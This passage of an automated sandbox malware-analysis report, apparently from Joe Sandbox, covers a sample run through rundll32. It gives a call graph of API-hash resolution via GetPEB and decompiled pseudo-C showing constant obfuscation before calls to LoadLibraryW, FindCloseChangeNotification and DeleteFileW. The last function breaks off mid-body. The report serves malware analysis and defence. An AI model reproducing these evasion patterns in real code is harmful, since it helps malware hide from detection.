4cbeb52 GetPEB 4670->4671 4672 4cb4b44 4671->4672 4672->4553 4674 4ccc8f4 4673->4674 4675 4cbeb52 GetPEB 4674->4675 4676 4ccc99d 4675->4676 4676->4553 4678 4cce36b 4677->4678 4679 4cbeb52 GetPEB 4678->4679 4680 4cce3fa 4679->4680 4680->4544 4682 4cc9c85 4681->4682 4683 4cbeb52 GetPEB 4682->4683 4684 4cc9d29 4683->4684 4684->4660 4686 4cc60de 4685->4686 4687 4cbeb52 GetPEB 4686->4687 4688 4cbefd1 4687->4688 4688->4553 4700 4cb1f38 4689->4700 4693 4cc0ade 4692->4693 4723 4ccf790 4693->4723 4696 4cc0c1f 4696->4099 4699 4cd1538 2 API calls 4699->4696 4704 4cb1f57 4700->4704 4706 4cb20da 4704->4706 4707 4cb20cc 4704->4707 4709 4cb7603 4704->4709 4712 4cd06ec 4704->4712 4716 4cbbd23 4704->4716 4720 4cbe5c0 4704->4720 4706->4099 4708 4cd1538 2 API calls 4707->4708 4708->4706 4710 4cbeb52 GetPEB 4709->4710 4711 4cb76d3 4710->4711 4711->4704 4713 4cd0702 4712->4713 4714 4cbeb52 GetPEB 4713->4714 4715 4cd079c 4714->4715 4715->4704 4717 4cbbd40 4716->4717 4718 4cbeb52 GetPEB 4717->4718 4719 4cbbdeb 4718->4719 4719->4704 4721 4cb556b GetPEB 4720->4721 4722 4cbe625 4721->4722 4722->4704 4724 4cbeb52 GetPEB 4723->4724 4725 4cc0bf0 4724->4725 4725->4696 4726 4cbdaaa 4725->4726 4727 4cbdac8 4726->4727 4728 4cbeb52 GetPEB 4727->4728 4729 4cbdb55 4728->4729 4729->4699 4731 4cb53e3 4730->4731 4732 4cbeb52 GetPEB 4731->4732 4733 4cb546b 4732->4733 4733->3941 4735 4cc2d03 4734->4735 4736 4cbeb52 GetPEB 4735->4736 4737 4cc2d8e 4736->4737 4737->4118 4739 4cb2e23 4738->4739 4740 4cbeb52 GetPEB 4739->4740 4741 4cb2ea5 4740->4741 4741->4118 4748 4cc9e1d 4742->4748 4743 4cc4244 2 API calls 4743->4748 4746 4cca1b5 4746->4125 4748->4743 4748->4746 4749 4ccfecb 2 API calls 4748->4749 4750 4cc96c2 4748->4750 4754 4cc5515 4748->4754 4759 4cd0a1a 4748->4759 4749->4748 4751 4cc96db 4750->4751 4752 4cbeb52 GetPEB 4751->4752 4753 4cc9765 4752->4753 4753->4748 4763 4cc0de5 4754->4763 4756 4cc5670 4756->4748 4760 4cd0a3f 4759->4760 4761 4cd31aa GetPEB 4760->4761 4762 4cd0a5c 4761->4762 4762->4748 4764 4cc0dfe 4763->4764 4765 4cbeb52 GetPEB 4764->4765 4766 4cc0eae 4765->4766 4766->4756 4767 4cd138b 4766->4767 4768 4cd13b8 4767->4768 4769 4cbeb52 GetPEB 4768->4769 4770 4cd1475 4769->4770 4770->4756 4772 4ccb1af 4771->4772 4773 4cbeb52 GetPEB 4772->4773 4774 4ccb248 4773->4774 4774->3941 4783 4cc83d6 4775->4783 4776 4cc851b 4777 4cb1a34 GetPEB 4776->4777 4778 4cc854b 4777->4778 4780 4cce1f8 2 API calls 4778->4780 4779 4cd0db1 GetPEB 4779->4783 4782 4cc8565 4780->4782 4781 4cc09dd GetPEB 4781->4783 4784 4cd2d0a GetPEB 4782->4784 4783->4776 4783->4779 4783->4781 4788 4cce1f8 2 API calls 4783->4788 4791 4cd2d0a GetPEB 4783->4791 4792 4cc8516 4783->4792 4793 4ccfecb 2 API calls 4783->4793 4892 4cbbaa9 4783->4892 4896 4cbbfbe 4783->4896 4786 4cc85a6 4784->4786 4787 4ccfecb 2 API calls 4786->4787 4789 4cc85c6 4787->4789 4788->4783 4790 4cc85ff 3 API calls 4789->4790 4790->4792 4791->4783 4792->4135 4793->4783 4805 4cd04c6 4795->4805 4796 4cd05e9 4798 4cc85ff 3 API calls 4796->4798 4797 4cd05e7 4797->4135 4798->4797 4799 4cd0db1 GetPEB 4799->4805 4800 4cc09dd GetPEB 4800->4805 4801 4cbbaa9 GetPEB 4801->4805 4802 4cce1f8 2 API calls 4802->4805 4803 4cd2d0a GetPEB 4803->4805 4804 4ccfecb 2 API calls 4804->4805 4805->4796 4805->4797 4805->4799 4805->4800 4805->4801 4805->4802 4805->4803 4805->4804 4806 4cbbfbe 3 API calls 4805->4806 4806->4805 4812 4cbba26 4807->4812 4808 4cbba9c 4808->4135 4809 4cd2b09 2 API calls 4809->4812 4810 4cd1028 GetPEB 4810->4812 4812->4808 4812->4809 4812->4810 4813 4cd1538 2 API calls 4812->4813 4907 4cbf0e9 4812->4907 4813->4812 4915 4cd1f6d 4814->4915 4816 4cd0a64 2 API calls 4833 4cbb3e7 4816->4833 4818 4cb1a34 GetPEB 4818->4833 4819 4cc85ff 3 API calls 4819->4833 4820 4cbb7fd 4824 4cd1538 2 API calls 4820->4824 4821 4cd0db1 GetPEB 4821->4833 4822 4cbb7fb 4822->4135 4823 4cd44ad GetPEB 4823->4833 4824->4822 4825 4cd2b09 GetPEB RtlFreeHeap 4825->4833 4826 4cc09dd GetPEB 4826->4833 4827 4cc00c5 GetPEB 4827->4833 4828 4cbbaa9 GetPEB 4828->4833 4830 4cce1f8 GetPEB RtlAllocateHeap 4830->4833 4831 4cd2d0a GetPEB 4831->4833 4832 4ccfecb GetPEB RtlFreeHeap 4832->4833 4833->4816 4833->4818 4833->4819 4833->4820 4833->4821 4833->4822 4833->4823 4833->4825 4833->4826 4833->4827 4833->4828 4833->4830 4833->4831 4833->4832 4834 4cbbfbe 3 API calls 4833->4834 4918 4cbf726 4833->4918 4922 4ccd8db 4833->4922 4834->4833 4836 4cccfe9 4835->4836 4838 4ccd0f3 4836->4838 4840 4ccd0f1 4836->4840 4932 4cc0ebc 4836->4932 4936 4cd3263 4836->4936 4944 4cbe2bd 4836->4944 4839 4cbf0e9 GetPEB 4838->4839 4839->4840 4840->4135 4861 4cb2ad8 4843->4861 4844 4ccc387 GetPEB 4844->4861 4845 4cb2d78 4846 4cc85ff 3 API calls 4845->4846 4849 4cb2da8 4846->4849 4847 4cb2d64 4852 4cd1538 2 API calls 4847->4852 4851 4cb2d62 4849->4851 4853 4cd1538 2 API calls 4849->4853 4851->4135 4852->4851 4853->4847 4854 4cd0db1 GetPEB 4854->4861 4856 4cc09dd GetPEB 4856->4861 4857 4cd1538 GetPEB FindCloseChangeNotification 4857->4861 4858 4cbbaa9 GetPEB 4858->4861 4859 4cce1f8 2 API calls 4859->4861 4860 4cd2d0a GetPEB 4860->4861 4861->4844 4861->4845 4861->4847 4861->4851 4861->4854 4861->4856 4861->4857 4861->4858 4861->4859 4861->4860 4862 4ccfecb 2 API calls 4861->4862 4863 4cbbfbe 3 API calls 4861->4863 4957 4cc9774 4861->4957 4965 4cc017b 4861->4965 4974 4ccbc6b 4861->4974 4862->4861 4863->4861 4883 4ccaadf 4864->4883 4865 4ccac24 4867 4cb1a34 GetPEB 4865->4867 4866 4ccac1f 4866->4135 4869 4ccac51 4867->4869 4868 4cd0db1 GetPEB 4868->4883 4870 4cce1f8 2 API calls 4869->4870 4872 4ccac74 4870->4872 4871 4cc09dd GetPEB 4871->4883 4873 4cd2d0a GetPEB 4872->4873 4875 4ccacaf 4873->4875 4874 4cbbaa9 GetPEB 4874->4883 4876 4ccfecb 2 API calls 4875->4876 4877 4ccaccf 4876->4877 4879 4cc85ff 3 API calls 4877->4879 4878 4cce1f8 2 API calls 4878->4883 4879->4866 4880 4cd2d0a GetPEB 4880->4883 4881 4ccfecb 2 API calls 4881->4883 4882 4cbbfbe 3 API calls 4882->4883 4883->4865 4883->4866 4883->4868 4883->4871 4883->4874 4883->4878 4883->4880 4883->4881 4883->4882 4890 4cd307f 4884->4890 4885 4cd318a 4885->4135 4886 4cd318c 4888 4cbf0e9 GetPEB 4886->4888 4887 4cd3263 GetPEB 4887->4890 4888->4885 4889 4cc0ebc GetPEB 4889->4890 4890->4885 4890->4886 4890->4887 4890->4889 4891 4cbe2bd GetPEB 4890->4891 4891->4890 4893 4cbbac2 4892->4893 4894 4cbdc1b GetPEB 4893->4894 4895 4cbbb97 4894->4895 4895->4783 4897 4cbbfd7 4896->4897 4898 4cbc273 4897->4898 4899 4cd45ca 2 API calls 4897->4899 4901 4cbc271 4897->4901 4903 4ccc41a 4897->4903 4900 4cd1538 2 API calls 4898->4900 4899->4897 4900->4901 4901->4783 4904 4ccc440 4903->4904 4905 4cbeb52 GetPEB 4904->4905 4906 4ccc4e1 4905->4906 4906->4897 4908 4cbf0ff 4907->4908 4911 4cbf8a9 4908->4911 4912 4cbf8c6 4911->4912 4913 4cbeb52 GetPEB 4912->4913 4914 4cbf1c3 4913->4914 4914->4812 4916 4cbeb52 GetPEB 4915->4916 4917 4cd2000 4916->4917 4917->4833 4919 4cbf758 4918->4919 4920 4cbeb52 GetPEB 4919->4920 4921 4cbf7dc 4920->4921 4921->4833 4923 4ccd8fb 4922->4923 4924 4ccdb95 4923->4924 4925 4ccdb93 4923->4925 4926 4cbc5d8 2 API calls 4923->4926 4928 4cccad5 4924->4928 4925->4833 4926->4923 4929 4cccaef 4928->4929 4930 4ccc9b0 GetPEB 4929->4930 4931 4cccbda 4930->4931 4931->4925 4933 4cc0ede 4932->4933 4934 4cbeb52 GetPEB 4933->4934 4935 4cc0f72 4934->4935 4935->4836 4937 4cd327e 4936->4937 4938 4cd3556 4937->4938 4949 4cc62c7 4937->4949 4938->4836 4941 4ccc9b0 GetPEB 4942 4cd350d 4941->4942 4942->4938 4943 4ccc9b0 GetPEB 4942->4943 4943->4942 4947 4cbe2d8 4944->4947 4945 4cbe3f5 4945->4836 4946 4cb483c GetPEB 4946->4947 4947->4945 4947->4946 4953 4cb1afd 4947->4953 4950 4cc62eb 4949->4950 4951 4cbeb52 GetPEB 4950->4951 4952 4cc6383 4951->4952 4952->4938 4952->4941 4954 4cb1b10 4953->4954 4955 4cbeb52 GetPEB 4954->4955 4956 4cb1bba 4955->4956 4956->4947 4958 4cc9797 4957->4958 4960 4cc9967 4958->4960 4961 4ccbc6b GetPEB 4958->4961 4962 4cc9956 4958->4962 4977 4cb72c4 4958->4977 4981 4cbf9c1 4958->4981 4960->4861 4961->4958 4964 4cd1538 2 API calls 4962->4964 4964->4960 4966 4cc01c2 4965->4966 4969 4ccfe2a GetPEB 4966->4969 4970 4cc06f1 4966->4970 4971 4cce1f8 2 API calls 4966->4971 4973 4ccfecb 2 API calls 4966->4973 4985 4cb473d 4966->4985 4989 4cc4178 4966->4989 4993 4cc7952 4966->4993 4969->4966 4970->4861 4971->4966 4973->4966 4975 4cbeb52 GetPEB 4974->4975 4976 4ccbd0a 4975->4976 4976->4861 4978 4cb72e0 4977->4978 4979 4cbeb52 GetPEB 4978->4979 4980 4cb737c 4979->4980 4980->4958 4982 4cbf9eb 4981->4982 4983 4cbeb52 GetPEB 4982->4983 4984 4cbfa7c 4983->4984 4984->4958 4986 4cb4786 4985->4986 4987 4cbeb52 GetPEB 4986->4987 4988 4cb481a 4987->4988 4988->4966 4990 4cc4194 4989->4990 4991 4cbeb52 GetPEB 4990->4991 4992 4cc4233 4991->4992 4992->4966 4994 4cc7965 4993->4994 4995 4cbeb52 GetPEB 4994->4995 4996 4cc7a04 4995->4996 4996->4966 4998 4cbdd16 4997->4998 5000 4cbdd30 4997->5000 4999 4cd2b09 2 API calls 4998->4999 4998->5000 4999->4998 5000->4149 5004 4cd41ee 5001->5004 5002 4cce1f8 2 API calls 5002->5004 5003 4cd43c9 5003->4149 5004->5002 5004->5003 5006 4cbf96f GetPEB 5004->5006 5007 4cd43b4 5004->5007 5009 4ccfecb 2 API calls 5004->5009 5010 4cbc5d8 2 API calls 5004->5010 5015 4cc3d85 5004->5015 5006->5004 5008 4cd2b09 2 API calls 5007->5008 5008->5003 5009->5004 5010->5004 5012 4cb328d 5011->5012 5019 4cb7442 5012->5019 5016 4cc3d9c 5015->5016 5017 4cbc5d8 2 API calls 5016->5017 5018 4cc3e5b 5017->5018 5018->5004 5018->5018 5022 4cb7462 5019->5022 5020 4cbc5d8 2 API calls 5020->5022 5022->5020 5025 4cb7576 5022->5025 5026 4cb331d 5022->5026 5028 4cc8fae 5022->5028 5037 4cc0d04 5022->5037 5042 4cc0f86 5022->5042 5027 4cd2b09 2 API calls 5025->5027 5026->4149 5027->5026 5029 4cc94f3 5028->5029 5030 4cc969b 5029->5030 5032 4cc9699 5029->5032 5033 4cce1f8 GetPEB RtlAllocateHeap 5029->5033 5035 4cb738a GetPEB 5029->5035 5036 4ccfecb GetPEB RtlFreeHeap 5029->5036 5059 4cbbc32 5029->5059 5031 4cbf7fe GetPEB 5030->5031 5031->5032 5032->5022 5033->5029 5035->5029 5036->5029 5063 4cb2ebf 5037->5063 5040 4cd2b09 2 API calls 5041 4cc0dde 5040->5041 5041->5022 5050 4cc1c7c 5042->5050 5044 4cce1f8 GetPEB RtlAllocateHeap 5044->5050 5045 4ccc237 GetPEB 5045->5050 5046 4cb2ebf GetPEB 5046->5050 5047 4cbbc32 GetPEB 5047->5050 5049 4cc2118 5053 4cbf7fe GetPEB 5049->5053 5050->5044 5050->5045 5050->5046 5050->5047 5050->5049 5052 4cc2116 5050->5052 5055 4cb738a GetPEB 5050->5055 5057 4ccc9b0 GetPEB 5050->5057 5058 4ccfecb GetPEB RtlFreeHeap 5050->5058 5067 4cb3431 5050->5067 5082 4cd16c0 5050->5082 5086 4ccc2cf 5050->5086 5090 4cd43e6 5050->5090 5094 4cb51e7 5050->5094 5052->5022 5053->5052 5055->5050 5057->5050 5058->5050 5060 4cbbc62 5059->5060 5061 4cbeb52 GetPEB 5060->5061 5062 4cbbd08 5061->5062 5062->5029 5064 4cb2ed3 5063->5064 5065 4cbeb52 GetPEB 5064->5065 5066 4cb2f74 5065->5066 5066->5040 5068 4cb4267 5067->5068 5069 4cd2b09 2 API calls 5068->5069 5070 4cb4738 5068->5070 5071 4cce1f8 GetPEB RtlAllocateHeap 5068->5071 5072 4cb42a0 5068->5072 5073 4cbf288 GetPEB 5068->5073 5074 4cbc5d8 2 API calls 5068->5074 5076 4cc00c5 GetPEB 5068->5076 5079 4cb738a GetPEB 5068->5079 5081 4ccfecb GetPEB RtlFreeHeap 5068->5081 5098 4cb50e8 5068->5098 5102 4cb49a4 5068->5102 5069->5068 5070->5070 5071->5068 5077 4cbf7fe GetPEB 5072->5077 5073->5068 5074->5068 5076->5068 5078 4cb42be 5077->5078 5078->5050 5079->5068 5081->5068 5083 4cd16f5 5082->5083 5084 4cbeb52 GetPEB 5083->5084 5085 4cd17a1 5084->5085 5085->5050 5087 4ccc2e5 5086->5087 5088 4cbeb52 GetPEB 5087->5088 5089 4ccc370 5088->5089 5089->5050 5091 4cd4405 5090->5091 5092 4cbeb52 GetPEB 5091->5092 5093 4cd4498 5092->5093 5093->5050 5095 4cb5206 5094->5095 5096 4cbeb52 GetPEB 5095->5096 5097 4cb52a5 5096->5097 5097->5050 5099 4cb5123 5098->5099 5100 4cbeb52 GetPEB 5099->5100 5101 4cb51c6 5100->5101 5101->5068 5103 4cb49d5 5102->5103 5104 4cbeb52 GetPEB 5103->5104 5105 4cb4a6b 5104->5105 5105->5068 5107 4cb48f4 5106->5107 5108 4cbeb52 GetPEB 5107->5108 5109 4cb4996 5108->5109 5109->4157 5111 4ccdfa2 5110->5111 5112 4cb53d0 GetPEB 5111->5112 5114 4cce1f8 2 API calls 5111->5114 5115 4cb2dea GetPEB 5111->5115 5116 4cce0e6 5111->5116 5117 4ccfecb 2 API calls 5111->5117 5128 4cd298d 5111->5128 5112->5111 5114->5111 5115->5111 5116->4170 5117->5111 5119 4cb1cc0 5118->5119 5121 4ccfe2a GetPEB 5119->5121 5122 4cb1e90 5119->5122 5132 4cb2f80 5119->5132 5136 4cc06fe 5119->5136 5121->5119 5122->4170 5125 4cb8581 5124->5125 5126 4cbeb52 GetPEB 5125->5126 5127 4cb862b 5126->5127 5127->4173 5129 4cd29a3 5128->5129 5130 4cbeb52 GetPEB 5129->5130 5131 4cd2a27 5130->5131 5131->5111 5133 4cb2f9f 5132->5133 5134 4cbeb52 GetPEB 5133->5134 5135 4cb3039 5134->5135 5135->5119 5137 4cc071c 5136->5137 5138 4cbeb52 GetPEB 5137->5138 5139 4cc07dc 5138->5139 5139->5119 5163 4cb19eb 5164 4cb19b1 5163->5164 5164->5163 5165 4cbeb52 GetPEB 5164->5165 5166 4cb1aeb 5165->5166 5204 4ccbefd 5205 4cc09dd GetPEB 5204->5205 5206 4ccc1a1 5205->5206 5207 4cd061d 2 API calls 5206->5207 5208 4ccc1b8 5207->5208 5209 4ccc229 5208->5209 5210 4cce1f8 2 API calls 5208->5210 5211 4ccc1d6 5210->5211 5212 4cd2d0a GetPEB 5211->5212 5213 4ccc1ff 5212->5213 5214 4ccfecb 2 API calls 5213->5214 5215 4ccc212 5214->5215 5216 4cbd061 2 API calls 5215->5216 5216->5209 5167 4cd36aa 5177 4cd3bc2 5167->5177 5168 4cbc5d8 2 API calls 5168->5177 5169 4cd2b09 2 API calls 5169->5177 5170 4cd0db1 GetPEB 5170->5177 5171 4cd3df0 5172 4cd1538 2 API calls 5171->5172 5173 4cd3dee 5172->5173 5174 4cc09dd GetPEB 5174->5177 5176 4cd45ca 2 API calls 5176->5177 5177->5168 5177->5169 5177->5170 5177->5171 5177->5173 5177->5174 5177->5176 5179 4cd061d 2 API calls 5177->5179 5180 4cce406 5177->5180 5184 4cd27bc 5177->5184 5179->5177 5181 4cce434 5180->5181 5182 4cbeb52 GetPEB 5181->5182 5183 4cce4c9 5182->5183 5183->5177 5185 4cd27cf 5184->5185 5186 4cbeb52 GetPEB 5185->5186 5187 4cd2873 5186->5187 5187->5177 5140 4cc6395 5141 4cc647e 5140->5141 5142 4cc6453 5140->5142 5146 4ccefdd 5142->5146 5145 4ccd11a 2 API calls 5145->5141 5156 4ccf548 5146->5156 5147 4cbc307 GetPEB 5147->5156 5148 4ccfe2a GetPEB 5148->5156 5149 4ccf760 5152 4cc85ff 3 API calls 5149->5152 5150 4cc6466 5150->5141 5150->5145 5151 4cb1a34 GetPEB 5151->5156 5152->5150 5153 4cd0db1 GetPEB 5153->5156 5155 4cce1f8 GetPEB RtlAllocateHeap 5155->5156 5156->5147 5156->5148 5156->5149 5156->5150 5156->5151 5156->5153 5156->5155 5157 4cd2d0a GetPEB 5156->5157 5158 4ccfecb GetPEB RtlFreeHeap 5156->5158 5159 4cd061d 5156->5159 5157->5156 5158->5156 5160 4cd0636 5159->5160 5161 4cbeb52 GetPEB 5160->5161 5162 4cd06de lstrcmpiW 5161->5162 5162->5156 5188 4cca2a5 5189 4cca419 5188->5189 5190 4cc4244 2 API calls 5189->5190 5195 4cca467 5189->5195 5191 4cca434 5190->5191 5196 4cd3560 5191->5196 5194 4ccfecb 2 API calls 5194->5195 5197 4cd357f 5196->5197 5199 4cca44b 5197->5199 5200 4ccbddd 5197->5200 5199->5194 5201 4ccbdf6 5200->5201 5202 4cbeb52 GetPEB 5201->5202 5203 4ccbe7e 5202->5203 5203->5197

                                                                                                          Executed Functions

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 455 4cb52b9-4cb5385 call 4ccfe29 call 4cbeb52 LoadLibraryW
                                                                                                          C-Code - Quality: 82%
                                                                                                          			E04CB52B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _t47;
                                                                                                          				struct HINSTANCE__* _t59;
                                                                                                          				signed int _t61;
                                                                                                          				signed int _t62;
                                                                                                          				WCHAR* _t68;
                                                                                                          
                                                                                                          				_push(_a12);
                                                                                                          				_t68 = __ecx;
                                                                                                          				_push(_a8);
                                                                                                          				_push(_a4);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t47);
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_v28 = 0x68392e;
                                                                                                          				_v16 = 0xf5950b;
                                                                                                          				_v16 = _v16 ^ 0xb3325752;
                                                                                                          				_v16 = _v16 ^ 0xe58473b2;
                                                                                                          				_v16 = _v16 ^ 0x56462a2c;
                                                                                                          				_v8 = 0x3988bb;
                                                                                                          				_t61 = 0x3a;
                                                                                                          				_v8 = _v8 / _t61;
                                                                                                          				_v8 = _v8 + 0xf338;
                                                                                                          				_v8 = _v8 << 5;
                                                                                                          				_v8 = _v8 ^ 0x0035ea14;
                                                                                                          				_v12 = 0xe53120;
                                                                                                          				_v12 = _v12 ^ 0xa236e8c8;
                                                                                                          				_t62 = 0x62;
                                                                                                          				_v12 = _v12 / _t62;
                                                                                                          				_v12 = _v12 ^ 0x01ab7b97;
                                                                                                          				_v20 = 0x973198;
                                                                                                          				_v20 = _v20 * 0x60;
                                                                                                          				_v20 = _v20 ^ 0x38bce55b;
                                                                                                          				E04CBEB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
                                                                                                          				_t59 = LoadLibraryW(_t68); // executed
                                                                                                          				return _t59;
                                                                                                          			}














                                                                                                          0x04cb52c0
                                                                                                          0x04cb52c3
                                                                                                          0x04cb52c5
                                                                                                          0x04cb52c8
                                                                                                          0x04cb52cc
                                                                                                          0x04cb52cd
                                                                                                          0x04cb52d2
                                                                                                          0x04cb52d9
                                                                                                          0x04cb52e2
                                                                                                          0x04cb52e9
                                                                                                          0x04cb52f0
                                                                                                          0x04cb52f7
                                                                                                          0x04cb52fe
                                                                                                          0x04cb530a
                                                                                                          0x04cb530f
                                                                                                          0x04cb5314
                                                                                                          0x04cb531b
                                                                                                          0x04cb531f
                                                                                                          0x04cb5326
                                                                                                          0x04cb532d
                                                                                                          0x04cb5337
                                                                                                          0x04cb533f
                                                                                                          0x04cb5342
                                                                                                          0x04cb5349
                                                                                                          0x04cb5360
                                                                                                          0x04cb5363
                                                                                                          0x04cb5376
                                                                                                          0x04cb537f
                                                                                                          0x04cb5385

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID: 1$,*FV$.9h
                                                                                                          • API String ID: 1029625771-1870595533
                                                                                                          • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                          • Instruction ID: 75293ef3efd6bcd3df26e5bc14070c15f9e03745a3a1b9fa185421535591285c
                                                                                                          • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                          • Instruction Fuzzy Hash: 702156B5D00208FBEF08DFA8D94A9EEBBB5FB40304F108198E815A6250D3B46B14DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 95%
                                                                                                          			E04CD1538(void* __ecx, void* __edx, void* _a4) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				void* _t59;
                                                                                                          				int _t75;
                                                                                                          				signed int _t77;
                                                                                                          				signed int _t78;
                                                                                                          				signed int _t79;
                                                                                                          				signed int _t80;
                                                                                                          
                                                                                                          				_push(_a4);
                                                                                                          				E04CCFE29(_t59);
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_v32 = 0x73095a;
                                                                                                          				_v28 = 0xd34a52;
                                                                                                          				_v16 = 0xb3a153;
                                                                                                          				_t77 = 0x73;
                                                                                                          				_v16 = _v16 / _t77;
                                                                                                          				_v16 = _v16 + 0x4fd2;
                                                                                                          				_v16 = _v16 ^ 0xee3af97f;
                                                                                                          				_v16 = _v16 ^ 0xee3510f4;
                                                                                                          				_v20 = 0xee2064;
                                                                                                          				_v20 = _v20 << 0xe;
                                                                                                          				_v20 = _v20 ^ 0x88190a0a;
                                                                                                          				_v12 = 0x72c7a5;
                                                                                                          				_v12 = _v12 + 0x7839;
                                                                                                          				_t78 = 0x77;
                                                                                                          				_v12 = _v12 / _t78;
                                                                                                          				_t79 = 0x76;
                                                                                                          				_v12 = _v12 / _t79;
                                                                                                          				_v12 = _v12 ^ 0x00040652;
                                                                                                          				_v8 = 0x10c7fb;
                                                                                                          				_t80 = 0x6c;
                                                                                                          				_v8 = _v8 * 0x70;
                                                                                                          				_v8 = _v8 << 8;
                                                                                                          				_v8 = _v8 / _t80;
                                                                                                          				_v8 = _v8 ^ 0x00c83f8f;
                                                                                                          				E04CBEB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
                                                                                                          				_t75 = FindCloseChangeNotification(_a4); // executed
                                                                                                          				return _t75;
                                                                                                          			}
















                                                                                                          0x04cd153e
                                                                                                          0x04cd1543
                                                                                                          0x04cd1548
                                                                                                          0x04cd154f
                                                                                                          0x04cd1558
                                                                                                          0x04cd155f
                                                                                                          0x04cd156b
                                                                                                          0x04cd1570
                                                                                                          0x04cd1575
                                                                                                          0x04cd157c
                                                                                                          0x04cd1583
                                                                                                          0x04cd158a
                                                                                                          0x04cd1591
                                                                                                          0x04cd1595
                                                                                                          0x04cd159c
                                                                                                          0x04cd15a3
                                                                                                          0x04cd15ad
                                                                                                          0x04cd15b2
                                                                                                          0x04cd15ba
                                                                                                          0x04cd15bf
                                                                                                          0x04cd15c4
                                                                                                          0x04cd15cb
                                                                                                          0x04cd15d6
                                                                                                          0x04cd15e6
                                                                                                          0x04cd15e9
                                                                                                          0x04cd15f3
                                                                                                          0x04cd15f6
                                                                                                          0x04cd160a
                                                                                                          0x04cd1615
                                                                                                          0x04cd161a

                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNEL32(00040652), ref: 04CD1615
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.719523049.0000000004CB0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.719542129.0000000004CD6000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4cb0000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID: Zs$d
                                                                                                          • API String ID: 2591292051-3879001491
                                                                                                          • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                          • Instruction ID: 8e8a7e770db75c430c01956450e5dcad02ee0665d6493a97b1fbcf7a7b3ded4c
                                                                                                          • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                          • Instruction Fuzzy Hash: 24214CB5D00209EBEB04DFA5C8499DDBBB2EB40304F10C09DE614B7290D7B96B548F80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 530 4cbd061-4cbd14b call 4ccfe29 call 4cbeb52 DeleteFileW
                                                                                                          C-Code - Quality: 85%
                                                                                                          			E04CBD061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				signed int _v16;
                                                                                                          				signed int _v20;
                                                                                                          				signed int _v24;
                                                                                                          				signed int _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				intOrPtr _v36;
                                                                                                          				void* _t54;
                                                                                                          				int _t63;
                                                                                                          				signed int _t65;
                                                                                                          				WCHAR* _t69;
                                                                                                          
                                                                                                          				_push(_a12);
                                                                                                          				_t69 = __ecx;
                                                                                                          				_push(_a8);
                                                                                                          				_push(_a4);
                                                                                                          				_push(__ecx);
                                                                                                          				E04CCFE29(_t54);
                                                                                                          				_v28 = _v28 & 0x00000000;
                                                                                                          				_v24 = _v24 & 0x00000000;
                                                                                                          				_v36 = 0xa62646;
                                                                                                          				_v32 = 0x27199b;
                                                                                                          				_v20 = 0x942c55;
                                                                                                          				_v20 = _v20 | 0xf0368afe;
                                                                                                          				_v20 = _v20 << 0xa;
                                                                                                          				_v20 = _v20 ^ 0xfbcaf84d;
                                                                                                          				_v20 = _v20 ^ 0x217d6c33;
                                                                                                          				_v16 = 0xf28622;
                                                                                                          				_v16 = _v16 >> 0xe;
                                                                                                          				_v16 = _v16 | 0xeb4a9877;
                                                                                                          				_v16 = _v16 ^ 0x2aded5e4;
                                                                                                          				_v16 = _v16 ^ 0xc19eb21f;
                                                                                                          				_v12 = 0x4a5837;
                                                                                                          				_v12 = _v12 ^ 0xa3e571b7;
                                                                                                          				_v12 = _v12 + 0xffff6305;
                                                                                                          				_t65 = 0x6e;
                                                                                                          				_v12 = _v12 / _t65;
                                                                                                          				_v12 = _v12 ^ 0x01794185;
